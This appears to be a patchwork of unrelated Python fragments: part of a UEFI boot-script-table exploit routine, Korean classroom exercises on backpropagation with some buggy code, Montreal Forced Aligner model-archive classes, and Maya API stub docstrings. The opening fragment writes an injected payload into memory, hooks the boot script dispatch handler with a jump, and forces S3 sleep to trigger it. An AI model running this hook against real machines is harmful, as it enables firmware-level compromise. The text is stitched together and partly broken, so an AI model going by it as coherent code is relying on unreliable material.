max_size, page_size = 0, 0x1000
addr = (addr & 0xfffff000) + page_size
while max_size < 1024 * 1024:
if self._mem_read(addr - size, size) == '\0' * size:
addr -= size
return addr
addr += page_size
max_size += page_size
raise Exception('Unable to find unused memory to store payload')
def _hook(self, addr, payload):
hook_size = 0
data = self._mem_read(addr, 0x40)
while hook_size < self.JUMP_32_LEN:
size = self._disasm(data[hook_size:])
hook_size += size
data = data[:hook_size]
buff_size = len(payload) + hook_size + self.JUMP_32_LEN
buff_addr = self._find_zero_bytes(addr, buff_size)
# write payload + original bytes + jump back to hooked function
buff = payload + data + \
self._jump_32(buff_addr + len(payload) + hook_size, \
addr + hook_size)
self._mem_write(buff_addr, buff)
# write 32-bit jump from function to payload
self._mem_write(addr, self._jump_32(addr, buff_addr))
return buff_addr, buff_size, data
def exploit_test(self):
self.logger.start_test('UEFI boot script table vulnerability exploit')
# read ACPI global variable structure data
AcpiGlobalVariable = self._efi_var_read(self.EFI_VAR_NAME, self.EFI_VAR_GUID)
# get bootscript pointer
data = self._mem_read(AcpiGlobalVariable, self.BOOT_SCRIPT_OFFSET + 8)
boot_script = dword_at(data, self.BOOT_SCRIPT_OFFSET)
if boot_script == 0:
raise Exception('Unable to locate boot script table')
data = self._mem_read(boot_script, self.BOOT_SCRIPT_MAX_LEN)
# read and parse boot script
dispatch_addr = self.CustomUefiParser(quiet = True).parse( \
data, boot_script_addr = boot_script)
if dispatch_addr is None:
raise Exception('Unable to locate EFI_BOOT_SCRIPT_DISPATCH_OPCODE')
# compile payload
payload = Asm().compile(PAYLOAD)
# find offset of payload data area
offset = payload.find('\xff' + '\0' * (4 + 1 + 4))
if offset == -1: raise Exception('Invalid payload')
# execute payload as UEFI function handler
ret = self._hook(dispatch_addr, payload)
if ret is not None:
buff_addr, buff_size, old_data = ret
# go to the S3 sleep
time.sleep(3)
os.system('rtcwake -m mem -s %d' % self.WAKE_AFTER)
data = self._mem_read(buff_addr + offset + 1, 4 + 1 | |
print('====================================================================================================')
print('== NCS 문제 1. 아래의 스크립트를 테스트해보면 x 의 원소가 out 의 원소로 변경되었을 것이다.'
'다시 테스트할 때 x 의 원소가 out 의 원소로 변경되지 않게 하려면 어떻게 해야하는가?')
print('====================================================================================================\n')
import copy
import numpy as np
x = np.array([[1.0, -0.5], [-2.0, 3.0]])
print(x)
mask = (x <= 0)
print(mask)
out = x.copy()
print(out)
out[mask] = 0
print(out)
print(x)
# ■ 5장 목차
# 1. 역전파란 무럿인가?
# 2. 계산 그래프
# - 덧셈 그래프
# - 곱셈 그래프
# - 덧셈 그래프 역전파
# - 곱셈 그래프 역전파
# 3. 파이썬으로 단순한 계층 구현하기
# - 덧셈 계층 (역전파 포함)
# - 곱셈 계층 (역전파 포함)
# - Relu 계층 (역전파 포함)
# - sigmoid 계층 (역전파 포함)
# 4. Affine과 softmax계층 구현
# 5. 배치용 affine계층 구현
# 6. softmax wirh loss 계층
# 7. 오차역전파법 구현하기
# ■ 역전파란?
#
# 신경망 학습 처리에서 최소화되는 함수의 경사를 효율적으로 계산하기 위한 방법으로 "오류 역전파"가 있다.
#
# 함수의 경사(기울기)를 계산하는 방법
# 1. 수치 미분 <--- 너무 성능이 느림
# 2. 오류 역전파 <--- 성능이 빠르고 간단하다.
#
# * 순전파 vs 역전파
# - 순전파: 입력층 -> 은닉층 -> 출력층
# - 역전파: 출력층 -> 은닉층 -> 입력층
# 오차를 역전파시킨다.
#
# 출력층부터 차례대로 역방향으로 거슬로 올라가 각 층에 있는 노드의 오차를 계산할 수 있다.
# 각 노드의 오차를 계산하면 그 오차를 사용해서 함수의 기울기를 계산할 수 있다.
# "즉, 전파된 오차를 이용하여 가중치를 조정한다. "
# ↓
# 오차 역전파
# ■ 계산 그래프
#
# "순전파와 역전파의 계산 과정을 그래프로 나타내는 방법"
#
# 계산 그래프의 장점? 국소적 계산을 할 수 있다.
# 국소적 계산이란? 전체에 어떤 일이 벌어지던 상관없이 자신과 관계된
# 정보만으로 다음 결과를 출력할 수 있다는 것
#
# 그림 fig 5-4
#
# ■ 왜? 계산 그래프로 푸는가?
# 전체가 아무리 복잡해도 각 노드에서 단순한 계산에 집중하여 문제를 단순화시킬 수 있다.
#
# ■ 실제로 계산 그래프를 사용하는 가장 큰 이유는?
# 역전파를 통해서 미분을 효율적으로 계산할 수 있다.
# ↓
# 사과 값이 '아주 조금' 올랐을 때 '지불금액'이 얼마나 증가하는지를 알고 싶다는 것이다.
# => 지불금액을 사과 값으로 편미분 하면 ㅇ
# ↓
# 사과값이 1원 오르면 최종금액은 2.2원이 오른다.
print('====================================================================================================')
print('== 문제 100. 위에서 만든 곱셈 클래스를 객체화 시켜서 아래의 사과가격의 총 가격을 구하시오.')
print('====================================================================================================\n')
apple = 200
apple_num = 5
tax = 1.2
class MulLayer:
def __init__(self):
self.x = None
self.y = None
def forward(self, x, y):
self.x = x
self.y = y
out = x * y
return x * y
def backward(self, dout):
dx = dout * self.y
dy = dout * self.x
return dx, dy
apple_layer = MulLayer()
tax_layer = MulLayer()
apple_price = apple_layer.forward(apple, apple_num)
price = tax_layer.forward(apple_price, tax)
price
print('====================================================================================================')
print('== 문제 101. 덧셈 계층을 파이썬으로 구현하시오!')
print('====================================================================================================\n')
class AddLayer:
def __init__(self):
pass
def forward(self, x, y):
return x + y
def backward(self, dout):
dx = dout
dy = dout
return dx, dy
print('====================================================================================================')
print('== 문제 102. 사과 2개와 귤 5개를 구입하면 총 가격이 얼마인지 구하시오!')
print('====================================================================================================\n')
apple_node = MulLayer()
apple_price = apple_node.forward(200, 2)
orange_node = MulLayer()
orange_price = orange_node.forward(300, 5)
fruit_node = AddLayer()
fruit_price = fruit_node.forward(apple_price, orange_price)
total_node = MulLayer()
total_price = total_node.forward(fruit_price, 1.5)
print(total_price)
print('====================================================================================================')
print('== 문제 106. 문제 105번 역전파를 파이썬으로 구현하시오.')
print('====================================================================================================\n')
mul_apple_layer = MulLayer()
mul_mandarin_layer = MulLayer()
mul_pear_layer = MulLayer()
add_apple_mandarin_layer = AddLayer()
add_all_layer = AddLayer()
mul_tax_layer = MulLayer()
##순전파
apple_price = mul_apple_layer.forward(apple, apple_cnt)
mandarin_price = mul_mandarin_layer.forward(mandarin, mandarin_cnt)
pear_price = mul_pear_layer.forward(pear, pear_cnt)
apple_mandarin_price = add_apple_mandarin_layer.forward(apple_price, mandarin_price)
all_price = add_all_layer.forward(apple_mandarin_price, pear_price)
price = mul_tax_layer.forward(all_price, tax)
## 역전파
d_price = 1
d_all_price, d_tax = mul_tax_layer.backward(d_price) #6번
d_apple_mandarin_price, d_pear_price = add_all_layer.backward(d_all_price) #5번
d_apple_price, d_mandarin_price = add_apple_mandarin_layer.backward(d_apple_mandarin_price) #4번
d_apple, d_apple_cnt = mul_apple_layer.backward(d_apple_price) # 1번
d_mandarin, d_mandarin_cnt = mul_mandarin_layer.backward(d_mandarin_price) #2번
d_pear, d_pear_cnt = mul_pear_layer.backward(d_pear_price) # 3번
print(price)
print(d_apple, d_apple_cnt, d_mandarin, d_mandarin_cnt, d_pear, d_pear_cnt)
# ■ ReLU 함수를 만들기 전에 기본적으로 알아야할 문법
import copy
import numpy as np
x = np.array([[1.0, -0.5], [-2.0, 3.0]])
print(x)
mask = (x <= 0)
print(mask)
out = x.copy()
print(out)
out[mask] = 0
print(out)
print(x)
print('====================================================================================================')
print('== 문제 107. ReLU 함수를 파이썬으로 구현하시오!')
print('====================================================================================================\n')
class Relu:
def __init__(self):
self.mask = None
def forward(self, x):
self.mask = x <= 0
out = x.copy()
out[self.mask] = 0
return out
def backward(self, dout):
dout[self.mask] = 0
return dout
print('====================================================================================================')
print('== 문제 108. 아래의 x 변수를 생성하고 x 를 Relu 객체의 forward 함수에 넣으면 무엇이 출력되는지 확인하시오.')
print('====================================================================================================\n')
x = np.array([1.0, 5.0, -2.0, 3.0])
relu = Relu()
print(relu.forward(x))
import numpy as np
x = np.array([5, 6])
w = np.array([[2, 4, 4], [6, 3, 5]])
print(np.dot(x, w))
print('====================================================================================================')
print('== 문제 121. 문제 120번의 순전파를 구하는 함수를 forward 란 이름으로 생성하시오!')
print('====================================================================================================\n')
x = np.array([1, 2])
w = np.array([[1, 3, 5], [2, 4, 6]])
b = np.array([1, 2, 3])
def forward(x, w, b):
return np.dot(x, w) + b
print(forward(x, w, b))
print('====================================================================================================')
print('== 문제 122. 문제 121번의 역전파를 구하는 함수를 backward 란 이름으로 생성하시오!')
print('====================================================================================================\n')
out = np.array([6, 13, 20], ndmin=2)
x = np.array([1, 2], ndmin=2)
w = np.array([[1, 3, 5], [2, 4, 6]])
b = np.array([1, 2, 3])
def backward(x, w, out):
dx = np.dot(out, w.T)
dw = np.dot(x.T, out)
db = np.sum(out, axis=0)
return dx, dw, db
print(backward(x, w, out))
print('====================================================================================================')
print('== 문제 123. 위에서 만든 forward 함수와 backward 함수를 묶어서 class 로 구성하는데 class 이름은 Affine 이라고'
'해서 생성하시오!')
print('====================================================================================================\n')
class Affine:
def __init__(self, w, b):
self.w = w
self.b = b
def forward(self, x):
return np.dot(x, self.w) + self.b
def backward(self, x, out):
dx = np.dot(out, w.T)
dw = np.dot(x.T, out)
db = np.sum(out)
return dx, dw, db
a = Affine(w, b)
print(a.forward(x))
print(a.backward(x, out))
print('====================================================================================================')
print('== 문제 124. 아래의 2층 신경망의 순전파를 Affine 클래스를 사용해서 출력하시오!')
print('====================================================================================================\n')
x = np.array([1, 2], ndmin=2)
w1 = np.array([[1, 3, 5], [2, 4, 6]])
b1 = np.array([1, 2, 3])
w2 = np.array([[1, 4], [2, 5], [3, 6]])
b2 = np.array([1, 2])
a1 = Affine(w1, b1)
z1 = a1.forward(x)
a2 = Affine(w2, b2)
z2 = a2.forward(z1)
print(z2)
print('====================================================================================================')
print('== 문제 125. 아래의 2층 신경망의 역전파를 Affine 클래스를 사용해서 출력하시오!')
print('====================================================================================================\n')
x = np.array([1, 2])
w1 = np.array([[1, 3, 5], [2, 4, 6]])
b1 = np.array([1, 2, 3])
w2 = np.array([[1, 4], [2, 5], [3, 6]])
b2 = np.array([1, 2])
a1 = Affine(w1, b1)
z1 = a1.forward(x)
a2 = Affine(w2, b2)
z2 = a2.forward(z1)
dx2, dw2, db2 = a2.backward(z1, z2)
dx1, dw1, db = a1.backward(x, dx2)
print(dx1, dw1, db)
print('====================================================================================================')
print('== 문제 126. 다시 2층 신경망의 순전파를 구현하는데 은닉층에 활성화 함수로 Relu 함수를 추가해서 구현하시오!')
print('====================================================================================================\n')
x = np.array([1, 2])
w1 = np.array([[1, 3, 5], [2, 4, 6]])
b1 = np.array([1, 2, 3])
w2 = np.array([[1, 4], [2, 5], [3, 6]])
b2 = np.array([1, 2])
a1 = Affine(w1, b1)
z1 = a1.forward(x)
h1 = Relu()
z1 = h1.forward(z1)
a2 = Affine(w2, b2)
z2 = a2.forward(z1)
print(z2)
print('====================================================================================================')
print('== 문제 127. Relu 함수가 추가된 상태에서 위의 2층 신경망의 역전파를 구현하시오!')
print('====================================================================================================\n')
x = np.array([1, 2])
w1 = np.array([[1, 3, 5], [2, 4, 6]])
b1 = np.array([1, 2, 3])
w2 = np.array([[1, 4], [2, 5], [3, 6]])
b2 = np.array([1, 2])
a1 = Affine(w1, b1)
z1 = a1.forward(x)
h1 = Relu()
z1 = h1.forward(z1)
a2 = Affine(w2, b2)
z2 = a2.forward(z1)
a2.backward(h1)
print('====================================================================================================')
print('== 문제 128. 위에서 만든 softmaxWithloss 클래스를 객체화 시켜서 아래의 x (입력값), t(target value) 를 입력해서'
'순전파 오차율을 확인하시오!')
print('====================================================================================================\n')
print('====================================================================================================')
print('== 문제 129. 데이터만 mnist 가 아니라 쉽게 하나의 값으로 변경한 코드의 순전파 결과값을 출력하시오!')
print('====================================================================================================\n')
import numpy as np
from collections import OrderedDict
class TwoLayerNet:
def __init__(self):
# 가중치 초기화
self.params = {}
self.params['W1'] = np.array([[1,2,3],[4,5,6]]) #(2,3)
self.params['b1'] = np.array([1,2,3], ndmin=2) # (2, )
self.params['W2'] = np.array([[1,2,3],[4,5,6], [7,8,9]]) #(3,3)
self.params['b2'] = np.array([1,2,3], ndmin=2) #(2, )
# 계층 생성
self.layers = OrderedDict()
self.layers['Affine1'] = Affine(self.params['W1'], self.params['b1'])
self.layers['Relu1'] = Relu()
self.layers['Affine2'] = Affine(self.params['W2'], self.params['b2'])
self.lastLayer = SoftmaxWithLoss()
def predict(self, x):
for layer in self.layers.values():
x = layer.forward(x)
return x
# x : 입력 데이터, t : 정답 레이블
def loss(self, x, t):
y = self.predict(x)
return self.lastLayer.forward(y, t)
def accuracy(self, x, t):
y = self.predict(x)
y = np.argmax(y, axis=1)
if t.ndim != 1: t = np.argmax(t, axis=1)
accuracy = np.sum(y == t) / float(x.shape[0])
return accuracy
# x : 입력 데이터, t : 정답 레이블
def gradient(self, x, t):
# forward
self.loss(x, t)
# backward
dout = 1
dout = self.lastLayer.backward(dout)
layers = list(self.layers.values())
layers.reverse()
for layer in layers:
dout = layer.backward(dout)
# 결과 저장
grads = {}
grads['W1'], grads['b1'] = self.layers['Affine1'].dW, self.layers['Affine1'].db
grads['W2'], grads['b2'] = self.layers['Affine2'].dW, self.layers['Affine2'].db
return grads
class Relu:
def __init__(self):
self.mask = None
def forward(self, x):
self.mask = x <= 0
out = x.copy()
out[self.mask] = 0
return out
def backward(self, dout):
dout[self.mask] = 0
return dout
class Affine:
def __init__(self, W, b):
self.W = W
self.b = b
self.x = None
# 가중치와 편향 매개변수의 미분
self.dW = None
self.db = None
def forward(self, x):
self.x = x
out = np.dot(self.x, self.W) + self.b
return out
def backward(self, dout):
# 순전파 ▷ X : (2, 3), W : (3, 4) -> XㆍY : (2, 4)
# 역전파 ▷ XㆍY : (2, 4) -> X : (2, 4)ㆍWT, W : XTㆍ(2, 4)
dx = np.dot(dout, self.W.T)
self.dW = np.dot(self.x.T, dout)
self.db = np.sum(dout, axis=0) # 편향은 순전파시 각각의 데이터에 더해지므로, 역전파시에 각 축의 값이 편향의 원소에 모여야 한다
return dx
class | |
"""Class definitions for Montreal Forced Aligner models"""
from __future__ import annotations
import os
from shutil import copy, copyfile, make_archive, move, rmtree, unpack_archive
from typing import TYPE_CHECKING, Any, Collection, Dict, Optional, Union
import yaml
from .exceptions import (
LanguageModelNotFoundError,
ModelLoadError,
PronunciationAcousticMismatchError,
)
from .helper import TerminalPrinter
if TYPE_CHECKING:
from logging import Logger
from .aligner.adapting import AdaptingAligner
from .config import FeatureConfig
from .config.train_config import TrainingConfig
from .dictionary import Dictionary
from .lm.trainer import LmTrainer
from .trainers import BaseTrainer
TrainerType = Union[BaseTrainer, LmTrainer, AdaptingAligner]
MetaDict = Dict[str, Any]
# default format for output
FORMAT = "zip"
__all__ = [
"Archive",
"LanguageModel",
"AcousticModel",
"IvectorExtractor",
"DictionaryModel",
"G2PModel",
"MODEL_TYPES",
]
class Archive:
"""
Class representing data in a directory or archive file (zip, tar,
tar.gz/tgz)
Based on the prosodylab-aligner
(https://github.com/prosodylab/Prosodylab-Aligner) archive class.
Parameters
----------
source: str
Source path
root_directory: str
Root directory to unpack and store temporary files
"""
extensions = [".zip"]
def __init__(self, source: str, root_directory: Optional[str] = None):
from .config import TEMP_DIR
if root_directory is None:
root_directory = TEMP_DIR
self.root_directory = root_directory
self.source = source
self._meta = {}
self.name, _ = os.path.splitext(os.path.basename(source))
if os.path.isdir(source):
self.dirname = os.path.abspath(source)
else:
self.dirname = os.path.join(root_directory, self.name)
if not os.path.exists(self.dirname):
os.makedirs(root_directory, exist_ok=True)
unpack_archive(source, self.dirname)
files = os.listdir(self.dirname)
old_dir_path = os.path.join(self.dirname, files[0])
if len(files) == 1 and os.path.isdir(old_dir_path): # Backwards compatibility
for f in os.listdir(old_dir_path):
move(os.path.join(old_dir_path, f), os.path.join(self.dirname, f))
os.rmdir(old_dir_path)
def get_subclass_object(
self,
) -> Union[AcousticModel, G2PModel, LanguageModel, IvectorExtractor]:
"""
Instantiate subclass models based on files contained in the archive
Returns
-------
Union[AcousticModel, G2PModel, LanguageModel, IvectorExtractor]
Subclass model that was auto detected
"""
for f in os.listdir(self.dirname):
if f == "tree":
return AcousticModel(self.dirname, self.root_directory)
if f == "phones.sym":
return G2PModel(self.dirname, self.root_directory)
if f.endswith(".arpa"):
return LanguageModel(self.dirname, self.root_directory)
if f == "final.ie":
return IvectorExtractor(self.dirname, self.root_directory)
raise ModelLoadError(self.source)
@classmethod
def valid_extension(cls, filename: str) -> bool:
"""
Check whether a file has a valid extension for the given model archive
Parameters
----------
filename: str
File name to check
Returns
-------
bool
True if the extension matches the models allowed extensions
"""
if os.path.splitext(filename)[1] in cls.extensions:
return True
return False
@classmethod
def generate_path(cls, root: str, name: str, enforce_existence: bool = True) -> Optional[str]:
"""
Generate a path for a given model from the root directory and the name of the model
Parameters
----------
root: str
Root directory for the full path
name: str
Name of the model
enforce_existence: bool
Flag to return None if the path doesn't exist, defaults to True
Returns
-------
str
Full path in the root directory for the model
"""
for ext in cls.extensions:
path = os.path.join(root, name + ext)
if os.path.exists(path) or not enforce_existence:
return path
return None
def pretty_print(self):
"""
Pretty print the archive's meta data using TerminalPrinter
"""
printer = TerminalPrinter()
configuration_data = {"Archive": {"name": (self.name, "green"), "data": self.meta}}
printer.print_config(configuration_data)
@property
def meta(self) -> dict:
"""
Get the meta data associated with the model
"""
if not self._meta:
meta_path = os.path.join(self.dirname, "meta.yaml")
with open(meta_path, "r", encoding="utf8") as f:
self._meta = yaml.safe_load(f)
return self._meta
def add_meta_file(self, trainer: TrainerType) -> None:
"""
Add a metadata file from a given trainer to the model
Parameters
----------
trainer: TrainerType
The trainer to construct the metadata from
"""
with open(os.path.join(self.dirname, "meta.yaml"), "w", encoding="utf8") as f:
yaml.dump(trainer.meta, f)
@classmethod
def empty(cls, head: str, root_directory: Optional[str] = None) -> Archive:
"""
Initialize an archive using an empty directory
Parameters
----------
head: str
Directory name to create
root_directory: str, optional
Root directory to create temporary data, defaults to the MFA temporary directory
Returns
-------
Archive
Model constructed from the empty directory
"""
from .config import TEMP_DIR
if root_directory is None:
root_directory = TEMP_DIR
os.makedirs(root_directory, exist_ok=True)
source = os.path.join(root_directory, head)
os.makedirs(source, exist_ok=True)
return cls(source)
def add(self, source: str):
"""
Add file into archive
Parameters
----------
source: str
Path to file to copy into the directory
"""
copy(source, self.dirname)
def __repr__(self) -> str:
"""Representation string of a model"""
return f"{self.__class__.__name__}(dirname={self.dirname!r})"
def clean_up(self) -> None:
"""Remove temporary directory"""
rmtree(self.dirname)
def dump(self, path: str, archive_fmt: str = FORMAT) -> str:
"""
Write archive to disk, and return the name of final archive
Parameters
----------
path: str
Path to write to
archive_fmt: str, optional
Archive extension to use, defaults to ".zip"
Returns
-------
str
Path of constructed archive
"""
return make_archive(os.path.splitext(path)[0], archive_fmt, *os.path.split(self.dirname))
class AcousticModel(Archive):
"""
Class for storing acoustic models in MFA, exported as zip files containing the necessary Kaldi files
to be reused
"""
files = ["final.mdl", "final.alimdl", "final.occs", "lda.mat", "tree"]
extensions = [".zip", ".am"]
def add_meta_file(self, aligner: TrainerType) -> None:
"""
Add metadata file from a model trainer
Parameters
----------
aligner: TrainerType
Trainer to supply metadata information about the acoustic model
"""
with open(os.path.join(self.dirname, "meta.yaml"), "w", encoding="utf8") as f:
yaml.dump(aligner.meta, f)
@property
def feature_config(self) -> FeatureConfig:
"""
Return the FeatureConfig used in training the model
"""
from .config.feature_config import FeatureConfig
fc = FeatureConfig()
fc.update(self.meta["features"])
return fc
def adaptation_config(self) -> TrainingConfig:
"""
Generate an adaptation configuration
Returns
-------
TrainingConfig
Configuration to be used in adapting the acoustic model to new data
"""
from .config.train_config import load_no_sat_adapt, load_sat_adapt
if self.meta["features"]["fmllr"]:
train, align = load_sat_adapt()
else:
train, align = load_no_sat_adapt()
return train
@property
def meta(self) -> MetaDict:
"""
Metadata information for the acoustic model
"""
default_features = {
"type": "mfcc",
"use_energy": False,
"frame_shift": 10,
"pitch": False,
"fmllr": True,
}
if not self._meta:
meta_path = os.path.join(self.dirname, "meta.yaml")
if not os.path.exists(meta_path):
self._meta = {
"version": "0.9.0",
"architecture": "gmm-hmm",
"multilingual_ipa": False,
"features": default_features,
}
else:
with open(meta_path, "r", encoding="utf8") as f:
self._meta = yaml.safe_load(f)
if self._meta["features"] == "mfcc+deltas":
self._meta["features"] = default_features
if "uses_lda" not in self._meta: # Backwards compatibility
self._meta["uses_lda"] = os.path.exists(os.path.join(self.dirname, "lda.mat"))
if "multilingual_ipa" not in self._meta:
self._meta["multilingual_ipa"] = False
if "uses_sat" not in self._meta:
self._meta["uses_sat"] = False
if "phone_type" not in self._meta:
self._meta["phone_type"] = "triphone"
self._meta["phones"] = set(self._meta.get("phones", []))
self._meta["has_speaker_independent_model"] = os.path.exists(
os.path.join(self.dirname, "final.alimdl")
)
return self._meta
def pretty_print(self) -> None:
"""
Prints the metadata information to the terminal
"""
from .utils import get_mfa_version
printer = TerminalPrinter()
configuration_data = {"Acoustic model": {"name": (self.name, "green"), "data": {}}}
version_color = "green"
if self.meta["version"] != get_mfa_version():
version_color = "red"
configuration_data["Acoustic model"]["data"]["Version"] = (
self.meta["version"],
version_color,
)
if "citation" in self.meta:
configuration_data["Acoustic model"]["data"]["Citation"] = self.meta["citation"]
if "train_date" in self.meta:
configuration_data["Acoustic model"]["data"]["Train date"] = self.meta["train_date"]
configuration_data["Acoustic model"]["data"]["Architecture"] = self.meta["architecture"]
configuration_data["Acoustic model"]["data"]["Phone type"] = self.meta["phone_type"]
configuration_data["Acoustic model"]["data"]["Features"] = {
"Type": self.meta["features"]["type"],
"Frame shift": self.meta["features"]["frame_shift"],
}
if self.meta["phones"]:
configuration_data["Acoustic model"]["data"]["Phones"] = self.meta["phones"]
else:
configuration_data["Acoustic model"]["data"]["Phones"] = ("None found!", "red")
configuration_data["Acoustic model"]["data"]["Configuration options"] = {
"Multilingual IPA": self.meta["multilingual_ipa"],
"Performs speaker adaptation": self.meta["uses_sat"],
"Has speaker-independent model": self.meta["has_speaker_independent_model"],
"Performs LDA on features": self.meta["uses_lda"],
}
printer.print_config(configuration_data)
def add_model(self, source: str) -> None:
"""
Add file into archive
Parameters
----------
source: str
File to add
"""
for f in self.files:
if os.path.exists(os.path.join(source, f)):
copyfile(os.path.join(source, f), os.path.join(self.dirname, f))
def export_model(self, destination: str) -> None:
"""
Extract the model files to a new directory
Parameters
----------
destination: str
Destination directory to extract files to
"""
os.makedirs(destination, exist_ok=True)
for f in self.files:
if os.path.exists(os.path.join(self.dirname, f)):
copyfile(os.path.join(self.dirname, f), os.path.join(destination, f))
def log_details(self, logger: Logger) -> None:
"""
Log metadata information to a logger
Parameters
----------
logger: :class:`~logging.Logger`
Logger to send debug information to
"""
logger.debug("")
logger.debug("====ACOUSTIC MODEL INFO====")
logger.debug("Acoustic model root directory: " + self.root_directory)
logger.debug("Acoustic model dirname: " + self.dirname)
meta_path = os.path.join(self.dirname, "meta.yaml")
logger.debug("Acoustic model meta path: " + meta_path)
if not os.path.exists(meta_path):
logger.debug("META.YAML DOES NOT EXIST, this may cause issues in validating the model")
logger.debug("Acoustic model meta information:")
stream = yaml.dump(self.meta)
logger.debug(stream)
logger.debug("")
def validate(self, dictionary: Union[Dictionary, G2PModel]) -> None:
"""
Validate this acoustic model against a pronunciation dictionary or G2P model to ensure their
phone sets are compatible
Parameters
----------
dictionary: Union[Dictionary, G2PModel]
Dictionary or G2P model to compare phone sets with
Raises
------
PronunciationAcousticMismatchError
If there are phones missing from the acoustic model
"""
if isinstance(dictionary, G2PModel):
missing_phones = dictionary.meta["phones"] - set(self.meta["phones"])
else:
missing_phones = dictionary.nonsil_phones - set(self.meta["phones"])
if missing_phones:
raise (PronunciationAcousticMismatchError(missing_phones))
class IvectorExtractor(Archive):
"""
Model class for IvectorExtractor
"""
model_files = [
"final.ie",
"final.ubm",
"final.dubm",
"plda",
"mean.vec",
"trans.mat",
]
| |
asBool(*args, **kwargs):
"""
Retrieves the plug's value, as a boolean.
"""
pass
def asChar(*args, **kwargs):
"""
Retrieves the plug's value, as a single-byte integer.
"""
pass
def asDouble(*args, **kwargs):
"""
Retrieves the plug's value, as a double-precision float.
"""
pass
def asFloat(*args, **kwargs):
"""
Retrieves the plug's value, as a single-precision float.
"""
pass
def asInt(*args, **kwargs):
"""
Retrieves the plug's value, as a regular integer.
"""
pass
def asMAngle(*args, **kwargs):
"""
Retrieves the plug's value, as an MAngle.
"""
pass
def asMDistance(*args, **kwargs):
"""
Retrieves the plug's value, as an MDistance.
"""
pass
def asMObject(*args, **kwargs):
"""
Retrieves the plug's value, as as an MObject containing a direct reference to the plug's data.
"""
pass
def asMTime(*args, **kwargs):
"""
Retrieves the plug's value, as an MTime.
"""
pass
def asShort(*args, **kwargs):
"""
Retrieves the plug's value, as a short integer.
"""
pass
def asString(*args, **kwargs):
"""
Retrieves the plug's value, as a string.
"""
pass
def attribute(*args, **kwargs):
"""
Returns the attribute currently referenced by this plug.
"""
pass
def child(*args, **kwargs):
"""
Returns a plug for the specified child attribute of this plug.
"""
pass
def connectedTo(*args, **kwargs):
"""
Returns an array of plugs which are connected to this one.
"""
pass
def connectionByPhysicalIndex(*args, **kwargs):
"""
Returns a plug for the index'th connected element of this plug.
"""
pass
def constructHandle(*args, **kwargs):
"""
Constructs a data handle for the plug.
"""
pass
def destructHandle(*args, **kwargs):
"""
Destroys a data handle previously constructed using constructHandle().
"""
pass
def elementByLogicalIndex(*args, **kwargs):
"""
Returns a plug for the element of this plug array having the specified logical index.
"""
pass
def elementByPhysicalIndex(*args, **kwargs):
"""
Returns a plug for the element of this plug array having the specified physical index.
"""
pass
def evaluateNumElements(*args, **kwargs):
"""
Like numElements() but evaluates all connected elements first to ensure that they are included in the count.
"""
pass
def getExistingArrayAttributeIndices(*args, **kwargs):
"""
Returns an array of all the plug's logical indices which are currently in use.
"""
pass
def getSetAttrCmds(*args, **kwargs):
"""
Returns a list of strings containing the setAttr commands (in MEL syntax) for this plug and all of its descendents.
"""
pass
def isFreeToChange(*args, **kwargs):
"""
Returns a value indicating if the plug's value can be changed, after taking into account the effects of locking and connections.
"""
pass
def logicalIndex(*args, **kwargs):
"""
Returns this plug's logical index within its parent array.
"""
pass
def name(*args, **kwargs):
"""
Returns the name of the plug.
"""
pass
def node(*args, **kwargs):
"""
Returns the node that this plug belongs to.
"""
pass
def numChildren(*args, **kwargs):
"""
Returns the number of children this plug has.
"""
pass
def numConnectedChildren(*args, **kwargs):
"""
Returns the number of this plug's children which have connections.
"""
pass
def numConnectedElements(*args, **kwargs):
"""
Returns the number of this plug's elements which have connections.
"""
pass
def numElements(*args, **kwargs):
"""
Returns the number of the plug's logical indices which are currently in use. Connected elements which have not yet been evaluated may not yet fully exist and may be excluded from the count.
"""
pass
def parent(*args, **kwargs):
"""
Returns a plug for the parent of this plug.
"""
pass
def partialName(*args, **kwargs):
"""
Returns the name of the plug, formatted according to various criteria.
"""
pass
def selectAncestorLogicalIndex(*args, **kwargs):
"""
Changes the logical index of the specified attribute in the plug's path.
"""
pass
def setAttribute(*args, **kwargs):
"""
Switches the plug to reference the given attribute of the same node as the previously referenced attribute.
"""
pass
def setBool(*args, **kwargs):
"""
Sets the plug's value as a boolean.
"""
pass
def setChar(*args, **kwargs):
"""
Sets the plug's value as a single-byte integer.
"""
pass
def setDouble(*args, **kwargs):
"""
Sets the plug's value as a double-precision float.
"""
pass
def setFloat(*args, **kwargs):
"""
Sets the plug's value as a single-precision float.
"""
pass
def setInt(*args, **kwargs):
"""
Sets the plug's value as a regular integer.
"""
pass
def setMAngle(*args, **kwargs):
"""
Sets the plug's value as an MAngle.
"""
pass
def setMDataHandle(*args, **kwargs):
"""
Sets the plug's value as a data handle.
"""
pass
def setMDistance(*args, **kwargs):
"""
Sets the plug's value as an MDistance.
"""
pass
def setMObject(*args, **kwargs):
"""
Sets the plug's value as an MObject.
"""
pass
def setMPxData(*args, **kwargs):
"""
Sets the plug's value using custom plug-in data.
"""
pass
def setMTime(*args, **kwargs):
"""
Sets the plug's value as an MTime.
"""
pass
def setNumElements(*args, **kwargs):
"""
Pre-allocates space for count elements in an array of plugs.
"""
pass
def setShort(*args, **kwargs):
"""
Sets the plug's value as a short integer.
"""
pass
def setString(*args, **kwargs):
"""
Sets the plug's value as a string.
"""
pass
info = None
isArray = None
isCaching = None
isChannelBox = None
isChild = None
isCompound = None
isConnected = None
isDestination = None
isDynamic = None
isElement = None
isFromReferencedFile = None
isIgnoredWhenRendering = None
isKeyable = None
isLocked = None
isNetworked = None
isNull = None
isProcedural = None
isSource = None
__new__ = None
kAll = 0
kChanged = 2
kChildrenNotFreeToChange = 2
kFreeToChange = 0
kLastAttrSelector = 3
kNonDefault = 1
kNotFreeToChange = 1
class MArgParser(object):
"""
Command argument list parser.
"""
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def commandArgumentBool(*args, **kwargs):
"""
commandArgumentBool(argIndex) -> bool
Returns the specified command argument as a bool.
"""
pass
def commandArgumentDouble(*args, **kwargs):
"""
Alias for commandArgumentFloat().
"""
pass
def commandArgumentFloat(*args, **kwargs):
"""
commandArgumentFloat(argIndex) -> float
Returns the specified command argument as a float.
"""
pass
def commandArgumentInt(*args, **kwargs):
"""
commandArgumentInt(argIndex) -> int
Returns the specified command argument as an int.
"""
pass
def commandArgumentMAngle(*args, **kwargs):
"""
commandArgumentMAngle(argIndex) -> MAngle
Returns the specified command argument as an MAngle.
"""
pass
def commandArgumentMDistance(*args, **kwargs):
"""
commandArgumentMDistance(argIndex) -> MDistance
Returns the specified command argument as an MDistance.
"""
pass
